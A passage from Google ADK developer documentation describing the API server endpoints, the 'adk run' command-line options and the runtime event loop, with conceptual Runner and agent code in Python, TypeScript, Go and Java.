Fahrenheit).\n"}],"role":"model"},"invocationId":"e-71353f1e-aea1-4821-aa4b-46874a766853","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"sYT42eVC","timestamp":1743712221.899018}] ``` **Using `/run_sse`** ```shell curl -X POST http://localhost:8000/run_sse \ -H "Content-Type: application/json" \ -d '{ "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_123", "newMessage": { "role": "user", "parts": [{ "text": "Hey whats the weather in new york today" }] }, "streaming": false }' ``` You can set `streaming` to `true` to enable token-level streaming, which means the response will be returned to you in multiple chunks and the output should appear similar to: ```shell data: {"content":{"parts":[{"functionCall":{"id":"af-f83f8af9-f732-46b6-8cb5-7b5b73bbf13d","args":{"city":"new york"},"name":"get_weather"}}],"role":"model"},"invocationId":"e-3f6d7765-5287-419e-9991-5fffa1a75565","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"longRunningToolIds":[],"id":"ptcjaZBa","timestamp":1743712255.313043} data: {"content":{"parts":[{"functionResponse":{"id":"af-f83f8af9-f732-46b6-8cb5-7b5b73bbf13d","name":"get_weather","response":{"status":"success","report":"The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit)."}}}],"role":"user"},"invocationId":"e-3f6d7765-5287-419e-9991-5fffa1a75565","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"5aocxjaq","timestamp":1743712257.387306} data: {"content":{"parts":[{"text":"OK. The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit).\n"}],"role":"model"},"invocationId":"e-3f6d7765-5287-419e-9991-5fffa1a75565","author":"weather_time_agent","actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"id":"rAnWGSiV","timestamp":1743712257.391317} ``` **Send a query with a base64 encoded file using `/run` or `/run_sse`** ```shell curl -X POST http://localhost:8000/run \ -H 'Content-Type: application/json' \ -d '{ "appName":"my_sample_agent", "userId":"u_123", "sessionId":"s_123", "newMessage":{ "role":"user", "parts":[ { "text":"Describe this image" }, { "inlineData":{ "displayName":"my_image.png", "data":"iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAACXBIWXMAAAsTAAALEwEAmpw...", "mimeType":"image/png" } } ] }, "streaming":false }' ``` Info If you are using `/run_sse`, you should see each event as soon as it becomes available. ## Integrations ADK uses [Callbacks](https://google.github.io/adk-docs/callbacks/index.md) to integrate with third-party observability tools. These integrations capture detailed traces of agent calls and interactions, which are crucial for understanding behavior, debugging issues, and evaluating performance. - [Comet Opik](https://github.com/comet-ml/opik) is an open-source LLM observability and evaluation platform that [natively supports ADK](https://www.comet.com/docs/opik/tracing/integrations/adk). ## Deploy your agent Now that you've verified the local operation of your agent, you're ready to move on to deploying your agent! Here are some ways you can deploy your agent: - Deploy to [Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/index.md), a simple way to deploy your ADK agents to a managed service in Vertex AI on Google Cloud. - Deploy to [Cloud Run](https://google.github.io/adk-docs/deploy/cloud-run/index.md) and have full control over how you scale and manage your agents using serverless architecture on Google Cloud. ## Interactive API docs The API server automatically generates interactive API documentation using Swagger UI. This is an invaluable tool for exploring endpoints, understanding request formats, and testing your agent directly from your browser. To access the interactive docs, start the API server and navigate to in your web browser. You will see a complete, interactive list of all available API endpoints, which you can expand to see detailed information about parameters, request bodies, and response schemas. You can even click "Try it out" to send live requests to your running agents. ## API endpoints The following sections detail the primary endpoints for interacting with your agents. JSON Naming Convention - **Both Request and Response bodies** will use `camelCase` for field names (e.g., `"appName"`). ### Utility endpoints #### List available agents Returns a list of all agent applications discovered by the server. - **Method:** `GET` - **Path:** `/list-apps` **Example Request** ```shell curl -X GET http://localhost:8000/list-apps ``` **Example Response** ```json ["my_sample_agent", "another_agent"] ``` ______________________________________________________________________ ### Session management Sessions store the state and event history for a specific user's interaction with an agent. #### Update a session Updates an existing session. - **Method:** `PATCH` - **Path:** `/apps/{app_name}/users/{user_id}/sessions/{session_id}` **Request Body** ```json { "stateDelta": { "key1": "value1", "key2": 42 } } ``` **Example Request** ```shell curl -X PATCH http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_abc \ -H "Content-Type: application/json" \ -d '{"stateDelta":{"visit_count": 5}}' ``` **Example Response** ```json {"id":"s_abc","appName":"my_sample_agent","userId":"u_123","state":{"visit_count":5},"events":[],"lastUpdateTime":1743711430.022186} ``` #### Get a session Retrieves the details of a specific session, including its current state and all associated events. - **Method:** `GET` - **Path:** `/apps/{app_name}/users/{user_id}/sessions/{session_id}` **Example Request** ```shell curl -X GET http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_abc ``` **Example Response** ```json {"id":"s_abc","appName":"my_sample_agent","userId":"u_123","state":{"visit_count":5},"events":[...],"lastUpdateTime":1743711430.022186} ``` #### Delete a session Deletes a session and all of its associated data. - **Method:** `DELETE` - **Path:** `/apps/{app_name}/users/{user_id}/sessions/{session_id}` **Example Request** ```shell curl -X DELETE http://localhost:8000/apps/my_sample_agent/users/u_123/sessions/s_abc ``` **Example Response** A successful deletion returns an empty response with a `204 No Content` status code. ______________________________________________________________________ ### Agent execution These endpoints are used to send a new message to an agent and get a response. #### Run agent (single response) Executes the agent and returns all generated events in a single JSON array after the run is complete. - **Method:** `POST` - **Path:** `/run` **Request Body** ```json { "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_abc", "newMessage": { "role": "user", "parts": [ { "text": "What is the capital of France?" } ] } } ``` In TypeScript, currently only `camelCase` field names are supported (e.g. `appName`, `userId`, `sessionId`, etc.). **Example Request** ```shell curl -X POST http://localhost:8000/run \ -H "Content-Type: application/json" \ -d '{ "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_abc", "newMessage": { "role": "user", "parts": [{"text": "What is the capital of France?"}] } }' ``` #### Run agent (streaming) Executes the agent and streams events back to the client as they are generated using [Server-Sent Events (SSE)](https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events). - **Method:** `POST` - **Path:** `/run_sse` **Request Body** The request body is the same as for `/run`, with an additional optional `streaming` flag. ```json { "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_abc", "newMessage": { "role": "user", "parts": [ { "text": "What is the weather in New York?" } ] }, "streaming": true } ``` - `streaming`: (Optional) Set to `true` to enable token-level streaming for model responses. Defaults to `false`. **Example Request** ```shell curl -X POST http://localhost:8000/run_sse \ -H "Content-Type: application/json" \ -d '{ "appName": "my_sample_agent", "userId": "u_123", "sessionId": "s_abc", "newMessage": { "role": "user", "parts": [{"text": "What is the weather in New York?"}] }, "streaming": false }' ``` # Use the Command Line Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 ADK provides an interactive terminal interface for testing your agents. This is useful for quick testing, scripted interactions, and CI/CD pipelines. ## Run an agent Use the following command to run your agent in the ADK command line interface: ```shell adk run my_agent ``` ```shell npx @google/adk-devtools run agent.ts ``` ```shell go run agent.go ``` Create an `AgentCliRunner` class (see [Java Quickstart](https://google.github.io/adk-docs/get-started/java/index.md)) and run: ```shell mvn compile exec:java -Dexec.mainClass="com.example.agent.AgentCliRunner" ``` This starts an interactive session where you can type queries and see agent responses directly in your terminal: ```shell Running agent my_agent, type exit to exit. [user]: What's the weather in New York? [my_agent]: The weather in New York is sunny with a temperature of 25°C. [user]: exit ``` ## Session options The `adk run` command includes options for saving, resuming, and replaying sessions. ### Save sessions To save the session when you exit: ```shell adk run --save_session path/to/my_agent ``` You'll be prompted to enter a session ID, and the session will be saved to `path/to/my_agent/.session.json`. You can also specify the session ID upfront: ```shell adk run --save_session --session_id my_session path/to/my_agent ``` ### Resume sessions To continue a previously saved session: ```shell adk run --resume path/to/my_agent/my_session.session.json path/to/my_agent ``` This loads the previous session state and event history, displays it, and allows you to continue the conversation. ### Replay sessions To replay a session file without interactive input: ```shell adk run --replay path/to/input.json path/to/my_agent ``` The input file should contain initial state and queries: ```json { "state": {"key": "value"}, "queries": ["What is 2 + 2?", "What is the capital of France?"] } ``` ## Storage options | Option | Description | Default | | ------------------------ | --------------------------- | ------------------------------ | | `--session_service_uri` | Custom session storage URI | SQLite under `.adk/session.db` | | `--artifact_service_uri` | Custom artifact storage URI | Local `.adk/artifacts` | ### Example with storage options ```shell adk run --session_service_uri "sqlite:///my_sessions.db" path/to/my_agent ``` ## All options | Option | Description | | ------------------------ | ------------------------------------------------ | | `--save_session` | Save the session to a JSON file on exit | | `--session_id` | Session ID to use when saving | | `--resume` | Path to a saved session file to resume | | `--replay` | Path to an input file for non-interactive replay | | `--session_service_uri` | Custom session storage URI | | `--artifact_service_uri` | Custom artifact storage URI | # Runtime Event Loop Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 The ADK Runtime is the underlying engine that powers your agent application during user interactions. It's the system that takes your defined agents, tools, and callbacks and orchestrates their execution in response to user input, managing the flow of information, state changes, and interactions with external services like LLMs or storage. Think of the Runtime as the **"engine"** of your agentic application. You define the parts (agents, tools), and the Runtime handles how they connect and run together to fulfill a user's request. ## Core Idea: The Event Loop At its heart, the ADK Runtime operates on an **Event Loop**. This loop facilitates a back-and-forth communication between the `Runner` component and your defined "Execution Logic" (which includes your Agents, the LLM calls they make, Callbacks, and Tools). In simple terms: 1. The `Runner` receives a user query and asks the main `Agent` to start processing. 1. The `Agent` (and its associated logic) runs until it has something to report (like a response, a request to use a tool, or a state change) – it then **yields** or **emits** an `Event`. 1. The `Runner` receives this `Event`, processes any associated actions (like saving state changes via `Services`), and forwards the event onwards (e.g., to the user interface). 1. The `Agent`'s logic **resumes** from where it paused only *after* the `Runner` has processed the event, and then potentially sees the effects of the changes committed by the Runner. 1. This cycle repeats until the agent has no more events to yield for the current user query. This event-driven loop is the fundamental pattern governing how ADK executes your agent code. ## The Heartbeat: The Event Loop - Inner workings The Event Loop is the core operational pattern defining the interaction between the `Runner` and your custom code (Agents, Tools, Callbacks, collectively referred to as "Execution Logic" or "Logic Components" in the design document). It establishes a clear division of responsibilities: Note The specific method names and parameter names may vary slightly by SDK language (e.g., `agent.run_async(...)` in Python, `agent.Run(...)` in Go, `agent.runAsync(...)` in Java and TypeScript). Refer to the language-specific API documentation for details. ### Runner's Role (Orchestrator) The `Runner` acts as the central coordinator for a single user invocation. Its responsibilities in the loop are: 1. **Initiation:** Receives the end user's query (`new_message`) and typically appends it to the session history via the `SessionService`. 1. **Kick-off:** Starts the event generation process by calling the main agent's execution method (e.g., `agent_to_run.run_async(...)`). 1. **Receive & Process:** Waits for the agent logic to `yield` or `emit` an `Event`. Upon receiving an event, the Runner **promptly processes** it. This involves: - Using configured `Services` (`SessionService`, `ArtifactService`, `MemoryService`) to commit changes indicated in `event.actions` (like `state_delta`, `artifact_delta`). - Performing other internal bookkeeping. 1. **Yield Upstream:** Forwards the processed event onwards (e.g., to the calling application or UI for rendering). 1. **Iterate:** Signals the agent logic that processing is complete for the yielded event, allowing it to resume and generate the *next* event. *Conceptual Runner Loop:* ```py # Simplified view of Runner's main loop logic def run(new_query, ...) -> Generator[Event]: # 1. Append new_query to session event history (via SessionService) session_service.append_event(session, Event(author='user', content=new_query)) # 2. Kick off event loop by calling the agent agent_event_generator = agent_to_run.run_async(context) async for event in agent_event_generator: # 3. Process the generated event and commit changes session_service.append_event(session, event) # Commits state/artifact deltas etc. # memory_service.update_memory(...) # If applicable # artifact_service might have already been called via context during agent run # 4. Yield event for upstream processing (e.g., UI rendering) yield event # Runner implicitly signals agent generator can continue after yielding ``` ```typescript // Simplified view of Runner's main loop logic async * runAsync(newQuery: Content, ...): AsyncGenerator { // 1. Append newQuery to session event history (via SessionService) await sessionService.appendEvent({ session, event: createEvent({author: 'user', content: newQuery}) }); // 2. Kick off event loop by calling the agent const agentEventGenerator = agentToRun.runAsync(context); for await (const event of agentEventGenerator) { // 3. Process the generated event and commit changes // Commits state/artifact deltas etc. await sessionService.appendEvent({session, event}); // memoryService.updateMemory(...) // If applicable // artifactService might have already been called via context during agent run // 4. Yield event for upstream processing (e.g., UI rendering) yield event; // Runner implicitly signals agent generator can continue after yielding } } ``` ```go // Simplified conceptual view of the Runner's main loop logic in Go func (r *Runner) RunConceptual(ctx context.Context, session *session.Session, newQuery *genai.Content) iter.Seq2[*Event, error] { return func(yield func(*Event, error) bool) { // 1. Append new_query to session event history (via SessionService) // ... userEvent := session.NewEvent(ctx.InvocationID()) // Simplified for conceptual view userEvent.Author = "user" userEvent.LLMResponse = model.LLMResponse{Content: newQuery} if _, err := r.sessionService.Append(ctx, &session.AppendRequest{Event: userEvent}); err != nil { yield(nil, err) return } // 2. Kick off event stream by calling the agent // Assuming agent.Run also returns iter.Seq2[*Event, error] agentEventsAndErrs := r.agent.Run(ctx, &agent.RunRequest{Session: session, Input: newQuery}) for event, err := range agentEventsAndErrs { if err != nil { if !yield(event, err) { // Yield event even if there's an error, then stop return } return // Agent finished with an error } // 3. Process the generated event and commit changes // Only commit non-partial event to a session service (as seen in actual code) if !event.LLMResponse.Partial { if _, err := r.sessionService.Append(ctx, &session.AppendRequest{Event: event}); err != nil { yield(nil, err) return } } // memory_service.update_memory(...) // If applicable // artifact_service might have already been called via context during agent run // 4. Yield event for upstream processing if !yield(event, nil) { return // Upstream consumer stopped } } // Agent finished successfully } } ``` ```java // Simplified conceptual view of the Runner's main loop logic in Java. public Flowable runConceptual( Session session, InvocationContext invocationContext, Content newQuery ) { // 1. Append new_query to session event history (via SessionService) // ... sessionService.appendEvent(session, userEvent).blockingGet(); // 2. Kick off event stream by calling the agent Flowable agentEventStream = agentToRun.runAsync(invocationContext); // 3. Process each generated event, commit changes, and "yield" or "emit" return agentEventStream.map(event -> { // This mutates the session object (adds event, applies stateDelta). // The return value of appendEvent (a Single) is conceptually // just the event itself after processing. sessionService.appendEvent(session, event).blockingGet(); // Simplified blocking call // memory_service.update_memory(...) // If applicable - conceptual // artifact_service might have already been called via context during agent run // 4. "Yield" event for upstream processing // In RxJava, returning the event in map effectively yields it to the next operator or subscriber. return event; }); } ``` ### Execution Logic's Role (Agent, Tool, Callback) Your code within agents, tools, and callbacks is responsible for the actual computation and decision-making. Its interaction with the loop involves: 1. **Execute:** Runs its logic based on the current `InvocationContext`, including the session state *as it was when execution resumed*. 1. **Yield:** When the logic needs to communicate (send a message, call a tool, report a state change), it constructs an `Event` containing the relevant content and actions, and then `yield`s this event back to the `Runner`. 1. **Pause:** Crucially, execution of the agent logic **pauses immediately** after the `yield` statement (or `return` in RxJava). It waits for the `Runner` to complete step 3 (processing and committing). 1. **Resume:** *Only after* the `Runner` has processed the yielded event does the agent logic resume execution from the statement immediately following the `yield`. 1. **See Updated State:** Upon resumption, the agent logic can now reliably access the session state (`ctx.session.state`) reflecting the changes that were committed by the `Runner` from the *previously yielded* event. *Conceptual Execution Logic:* ```py # Simplified view of logic inside Agent.run_async, callbacks, or tools # ... previous code runs based on current state ... # 1. Determine a change or output is needed, construct the event # Example: Updating state update_data = {'field_1': 'value_2'} event_with_state_change = Event( author=self.name, actions=EventActions(state_delta=update_data), content=types.Content(parts=[types.Part(text="State updated.")]) # ... other event fields ... ) # 2. Yield the event to the Runner for processing & commit yield event_with_state_change # <<<<<<<<<<<< EXECUTION PAUSES HERE >>>>>>>>>>>> # <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> # 3. Resume execution ONLY after Runner is done processing the above event. # Now, the state committed by the Runner is reliably reflected. # Subsequent code can safely assume the change from the yielded event happened. val = ctx.session.state['field_1'] # here `val` is guaranteed to be "value_2" (assuming Runner committed successfully) print(f"Resumed execution. Value of field_1 is now: {val}") # ... subsequent code continues ... # Maybe yield another event later... ``` ```typescript // Simplified view of logic inside Agent.runAsync, callbacks, or tools // ... previous code runs based on current state ... // 1. Determine a change or output is needed, construct the event // Example: Updating state const updateData = {'field_1': 'value_2'}; const eventWithStateChange = createEvent({ author: this.name, actions: createEventActions({stateDelta: updateData}), content: {parts: [{text: "State updated."}]} // ... other event fields ... }); // 2. Yield the event to the Runner for processing & commit yield eventWithStateChange; // <<<<<<<<<<<< EXECUTION PAUSES HERE >>>>>>>>>>>> // <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // 3. Resume execution ONLY after Runner is done processing the above event. // Now, the state committed by the Runner is reliably reflected. // Subsequent code can safely assume the change from the yielded event happened. const val = ctx.session.state['field_1']; // here `val` is guaranteed to be "value_2" (assuming Runner committed successfully) console.log(`Resumed execution. Value of field_1 is now: ${val}`); // ... subsequent code continues ... // Maybe yield another event later... ``` ```go // Simplified view of logic inside Agent.Run, callbacks, or tools // ... previous code runs based on current state ... // 1. Determine a change or output is needed, construct the event // Example: Updating state updateData := map[string]interface{}{"field_1": "value_2"} eventWithStateChange := &Event{ Author: self.Name(), Actions: &EventActions{StateDelta: updateData}, Content: genai.NewContentFromText("State updated.", "model"), // ... other event fields ... } // 2. Yield the event to the Runner for processing & commit // In Go, this is done by sending the event to a channel. eventsChan <- eventWithStateChange // <<<<<<<<<<<< EXECUTION PAUSES HERE (conceptually) >>>>>>>>>>>> // The Runner on the other side of the channel will receive and process the event. // The agent's goroutine might continue, but the logical flow waits for the next input or step. // <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // 3. Resume execution ONLY after Runner is done processing the above event. // In a real Go implementation, this would likely be handled by the agent receiving // a new RunRequest or context indicating the next step. The updated state // would be part of the session object in that new request. // For this conceptual example, we'll just check the state. val := ctx.State.Get("field_1") // here `val` is guaranteed to be "value_2" because the Runner would have // updated the session state before calling the agent again. fmt.Printf("Resumed execution. Value of field_1 is now: %v\n", val) // ... subsequent code continues ... // Maybe send another event to the channel later... ``` ```java // Simplified view of logic inside Agent.runAsync, callbacks, or tools // ... previous code runs based on current state ... // 1. Determine a change or output is needed, construct the event // Example: Updating state ConcurrentMap updateData = new ConcurrentHashMap<>(); updateData.put("field_1", "value_2"); EventActions actions = EventActions.builder().stateDelta(updateData).build(); Content eventContent = Content.builder().parts(Part.fromText("State updated.")).build(); Event eventWithStateChange = Event.builder() .author(self.name()) .actions(actions) .content(Optional.of(eventContent)) // ... other event fields ... .build(); // 2. "Yield" the event. In RxJava, this means emitting it into the stream. // The Runner (or upstream consumer) will subscribe to this Flowable. // When the Runner receives this event, it will process it (e.g., call sessionService.appendEvent). // The 'appendEvent' in Java ADK mutates the 'Session' object held within 'ctx' (InvocationContext). // <<<<<<<<<<<< CONCEPTUAL PAUSE POINT >>>>>>>>>>>> // In RxJava, the emission of 'eventWithStateChange' happens, and then the stream // might continue with a 'flatMap' or 'concatMap' operator that represents // the logic *after* the Runner has processed this event. // To model the "resume execution ONLY after Runner is done processing": // The Runner's `appendEvent` is usually an async operation itself (returns Single). // The agent's flow needs to be structured such that subsequent logic // that depends on the committed state runs *after* that `appendEvent` completes. // This is how the Runner typically orchestrates it: // Runner: // agent.runAsync(ctx) // .concatMapEager(eventFromAgent -> // sessionService.appendEvent(ctx.session(), eventFromAgent) // This updates ctx.session().state() // .toFlowable() // Emits the event after it's processed // ) // .subscribe(processedEvent -> { /* UI renders processedEvent */ }); // So, within the agent's own logic, if it needs to do something *after* an event it yielded // has been processed and its state changes are reflected in ctx.session().state(), // that subsequent logic would typically be in another step of its reactive chain. // For this conceptual example, we'll emit the event, and then simulate the "resume" // as a subsequent operation in the Flowable chain. return Flowable.just(eventWithStateChange) // Step 2: Yield the event .concatMap(yieldedEvent -> { // <<<<<<<<<<<< RUNNER CONCEPTUALLY PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // At this point, in a real runner, ctx.session().appendEvent(yieldedEvent) would have been called // by the Runner, and ctx.session().state() would be updated. // Since we are *inside* the agent's conceptual logic trying to model this, // we assume the Runner's action has implicitly updated our 'ctx.session()'. // 3. Resume execution. // Now, the state committed by the Runner (via sessionService.appendEvent) // is reliably reflected in ctx.session().state(). Object val = ctx.session().state().get("field_1"); // here `val` is guaranteed to be "value_2" because the `sessionService.appendEvent` // called by the Runner would have updated the session state within the `ctx` object. System.out.println("Resumed execution. Value of field_1 is now: " + val); // ... subsequent code continues ... // If this subsequent code needs to yield another event, it would do so here. ``` This cooperative yield/pause/resume cycle between the `Runner` and your Execution Logic, mediated by `Event` objects, forms the core of the ADK Runtime. ## Key components of the Runtime Several components work together within the ADK Runtime to execute an agent invocation. Understanding their roles clarifies how the event loop functions: 1. ### `Runner` - **Role:** The main entry point and orchestrator for a single user query (`run_async`). - **Function:** Manages the overall Event Loop, receives events yielded by the Execution Logic, coordinates with Services to process and commit event actions (state/artifact changes), and forwards processed events upstream (e.g., to the UI). It essentially drives the conversation turn by turn based on yielded events. (Defined in `google.adk.runners.runner`). 1. ### Execution Logic Components - **Role:** The parts containing your custom code and the core agent capabilities. - **Components:** - `Agent` (`BaseAgent`, `LlmAgent`, etc.): Your primary logic units that process information and decide on actions. They implement the `_run_async_impl` method which yields events. - `Tools` (`BaseTool`, `FunctionTool`, `AgentTool`, etc.): External functions or capabilities used by agents (often `LlmAgent`) to interact with the outside world or perform specific tasks. They execute and return results, which are then wrapped in events. - `Callbacks` (Functions): User-defined functions attached to agents (e.g., `before_agent_callback`, `after_model_callback`) that hook into specific points in the execution flow, potentially modifying behavior or state, whose effects are captured in events. - **Function:** Perform the actual thinking, calculation, or external interaction. They communicate their results or needs by **yielding `Event` objects** and pausing until the Runner processes them. 1. ### `Event` - **Role:** The message passed back and forth between the `Runner` and the Execution Logic. - **Function:** Represents an atomic occurrence (user input, agent text, tool call/result, state change request, control signal). It carries both the content of the occurrence and the intended side effects (`actions` like `state_delta`). 1. ### `Services` - **Role:** Backend components responsible for managing persistent or shared resources. Used primarily by the `Runner` during event processing. - **Components:** - `SessionService` (`BaseSessionService`, `InMemorySessionService`, etc.): Manages `Session` objects, including saving/loading them, applying `state_delta` to the session state, and appending events to the `event history`. - `ArtifactService` (`BaseArtifactService`, `InMemoryArtifactService`, `GcsArtifactService`, etc.): Manages the storage and retrieval of binary artifact data. Although `save_artifact` is called via context during execution logic, the `artifact_delta` in the event confirms the action for the Runner/SessionService. - `MemoryService` (`BaseMemoryService`, etc.): (Optional) Manages long-term semantic memory across sessions for a user. - **Function:** Provide the persistence layer. The `Runner` interacts with them to ensure changes signaled by `event.actions` are reliably stored *before* the Execution Logic resumes. 1. ### `Session` - **Role:** A data container holding the state and history for *one specific conversation* between a user and the application. - **Function:** Stores the current `state` dictionary, the list of all past `events` (`event history`), and references to associated artifacts. It's the primary record of the interaction, managed by the `SessionService`. 1. ### `Invocation` - **Role:** A conceptual term representing everything that happens in response to a *single* user query, from the moment the `Runner` receives it until the agent logic finishes yielding events for that query. - **Function:** An invocation might involve multiple agent runs (if using agent transfer or `AgentTool`), multiple LLM calls, tool executions, and callback executions, all tied together by a single `invocation_id` within the `InvocationContext`. State variables prefixed with `temp:` are strictly scoped to a single invocation and discarded afterwards. These players interact continuously through the Event Loop to process a user's request. ## How It Works: A Simplified Invocation Let's trace a simplified flow for a typical user query that involves an LLM agent calling a tool: ### Step-by-Step Breakdown 1. **User Input:** The User sends a query (e.g., "What's the capital of France?"). 1. **Runner Starts:** `Runner.run_async` begins. It interacts with the `SessionService` to load the relevant `Session` and adds the user query as the first `Event` to the session history. An `InvocationContext` (`ctx`) is prepared. 1. **Agent Execution:** The `Runner` calls `agent.run_async(ctx)` on the designated root agent (e.g., an `LlmAgent`). 1. **LLM Call (Example):** The `Agent_Llm` determines it needs information, perhaps by calling a tool. It prepares a request for the `LLM`. Let's assume the LLM decides to call `MyTool`. 1. **Yield FunctionCall Event:** The `Agent_Llm` receives the `FunctionCall` response from the LLM, wraps it in an `Event(author='Agent_Llm', content=Content(parts=[Part(function_call=...)]))`, and `yields` or `emits` this event. 1. **Agent Pauses:** The `Agent_Llm`'s execution pauses immediately after the `yield`. 1. **Runner Processes:** The `Runner` receives the FunctionCall event. It passes it to the `SessionService` to record it in the history. The `Runner` then yields the event upstream to the `User` (or application). 1. **Agent Resumes:** The `Runner` signals that the event is processed, and `Agent_Llm` resumes execution. 1. **Tool Execution:** The `Agent_Llm`'s internal flow now proceeds to execute the requested `MyTool`. It calls `tool.run_async(...)`. 1. **Tool Returns Result:** `MyTool` executes and returns its result (e.g., `{'result': 'Paris'}`). 1. **Yield FunctionResponse Event:** The agent (`Agent_Llm`) wraps the tool result into an `Event` containing a `FunctionResponse` part (e.g., `Event(author='Agent_Llm', content=Content(role='user', parts=[Part(function_response=...)]))`). This event might also contain `actions` if the tool modified state (`state_delta`) or saved artifacts (`artifact_delta`). The agent `yield`s this event. 1. **Agent Pauses:** `Agent_Llm` pauses again. 1. **Runner Processes:** `Runner` receives the FunctionResponse event. It passes it to `SessionService` which applies any `state_delta`/`artifact_delta` and adds the event to history. `Runner` yields the event upstream. 1. **Agent Resumes:** `Agent_Llm` resumes, now knowing the tool result and any state changes are committed. 1. **Final LLM Call (Example):** `Agent_Llm` sends the tool result back to the `LLM` to generate a natural language response. 1. **Yield Final Text Event:** `Agent_Llm` receives the final text from the `LLM`, wraps it in an `Event(author='Agent_Llm', content=Content(parts=[Part(text=...)]))`, and `yield`s it. 1. **Agent Pauses:** `Agent_Llm` pauses. 1. **Runner Processes:** `Runner` receives the final text event, passes it to `SessionService` for history, and yields it upstream to the `User`. This is likely marked as the `is_final_response()`. 1. **Agent Resumes & Finishes:** `Agent_Llm` resumes. Having completed its task for this invocation, its `run_async` generator finishes. 1. **Runner Completes:** The `Runner` sees the agent's generator is exhausted and finishes its loop for this invocation. This yield/pause/process/resume cycle ensures that state changes are consistently applied and that the execution logic always operates on the most recently committed state after yielding an event. ## Important Runtime Behaviors Understanding a few key aspects of how the ADK Runtime handles state, streaming, and asynchronous operations is crucial for building predictable and efficient agents. ### State Updates & Commitment Timing - **The Rule:** When your code (in an agent, tool, or callback) modifies the session state (e.g., `context.state['my_key'] = 'new_value'`), this change is initially recorded locally within the current `InvocationContext`. The change is only **guaranteed to be persisted** (saved by the `SessionService`) *after* the `Event` carrying the corresponding `state_delta` in its `actions` has been `yield`-ed by your code and subsequently processed by the `Runner`. - **Implication:** Code that runs *after* resuming from a `yield` can reliably assume that the state changes signaled in the *yielded event* have been committed. ```py # Inside agent logic (conceptual) # 1. Modify state ctx.session.state['status'] = 'processing' event1 = Event(..., actions=EventActions(state_delta={'status': 'processing'})) # 2. Yield event with the delta yield event1 # --- PAUSE --- Runner processes event1, SessionService commits 'status' = 'processing' --- # 3. Resume execution # Now it's safe to rely on the committed state current_status = ctx.session.state['status'] # Guaranteed to be 'processing' print(f"Status after resuming: {current_status}") ``` ```typescript // Inside agent logic (conceptual) // 1. Modify state // In TypeScript, you modify state via the context, which tracks the change. ctx.state.set('status', 'processing'); // The framework will automatically populate actions with the state // delta from the context. For illustration, it's shown here. const event1 = createEvent({ actions: createEventActions({stateDelta: {'status': 'processing'}}), // ... other event fields }); // 2. Yield event with the delta yield event1; // --- PAUSE --- Runner processes event1, SessionService commits 'status' = 'processing' --- // 3. Resume execution // Now it's safe to rely on the committed state in the session object. const currentStatus = ctx.session.state['status']; // Guaranteed to be 'processing' console.log(`Status after resuming: ${currentStatus}`); ``` ```go // Inside agent logic (conceptual) func (a *Agent) RunConceptual(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { // The entire logic is wrapped in a function that will be returned as an iterator. return func(yield func(*session.Event, error) bool) { // ... previous code runs based on current state from the input `ctx` ... // e.g., val := ctx.State().Get("field_1") might return "value_1" here. // 1. Determine a change or output is needed, construct the event updateData := map[string]interface{}{"field_1": "value_2"} eventWithStateChange := session.NewEvent(ctx.InvocationID()) eventWithStateChange.Author = a.Name() eventWithStateChange.Actions = &session.EventActions{StateDelta: updateData} // ... other event fields ... // 2. Yield the event to the Runner for processing & commit. // The agent's execution continues immediately after this call. if !yield(eventWithStateChange, nil) { // If yield returns false, it means the consumer (the Runner) // has stopped listening, so we should stop producing events. return } // <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // This happens outside the agent, after the agent's iterator has // produced the event. // 3. The agent CANNOT immediately see the state change it just yielded. // The state is immutable within a single `Run` invocation. val := ctx.State().Get("field_1") // `val` here is STILL "value_1" (or whatever it was at the start). // The updated state ("value_2") will only be available in the `ctx` // of the *next* `Run` invocation in a subsequent turn. // ... subsequent code continues, potentially yielding more events ... finalEvent := session.NewEvent(ctx.InvocationID()) finalEvent.Author = a.Name() // ... yield(finalEvent, nil) } } ``` ```java // Inside agent logic (conceptual) // ... previous code runs based on current state ... // 1. Prepare state modification and construct the event ConcurrentHashMap stateChanges = new ConcurrentHashMap<>(); stateChanges.put("status", "processing"); EventActions actions = EventActions.builder().stateDelta(stateChanges).build(); Content content = Content.builder().parts(Part.fromText("Status update: processing")).build(); Event event1 = Event.builder() .actions(actions) // ... .build(); // 2. Yield event with the delta return Flowable.just(event1) .map( emittedEvent -> { // --- CONCEPTUAL PAUSE & RUNNER PROCESSING --- // 3. Resume execution (conceptually) // Now it's safe to rely on the committed state. String currentStatus = (String) ctx.session().state().get("status"); System.out.println("Status after resuming (inside agent logic): " + currentStatus); // Guaranteed to be 'processing' // The event itself (event1) is passed on. // If subsequent logic within this agent step produced *another* event, // you'd use concatMap to emit that new event. return emittedEvent; }); // ... subsequent agent logic might involve further reactive operators // or emitting more events based on the now-updated `ctx.session().state()`. ``` ### "Dirty Reads" of Session State - **Definition:** While commitment happens *after* the yield, code running *later within the same invocation*, but *before* the state-changing event is actually yielded and processed, **can often see the local, uncommitted changes**. This is sometimes called a "dirty read". - **Example:** ```py # Code in before_agent_callback callback_context.state['field_1'] = 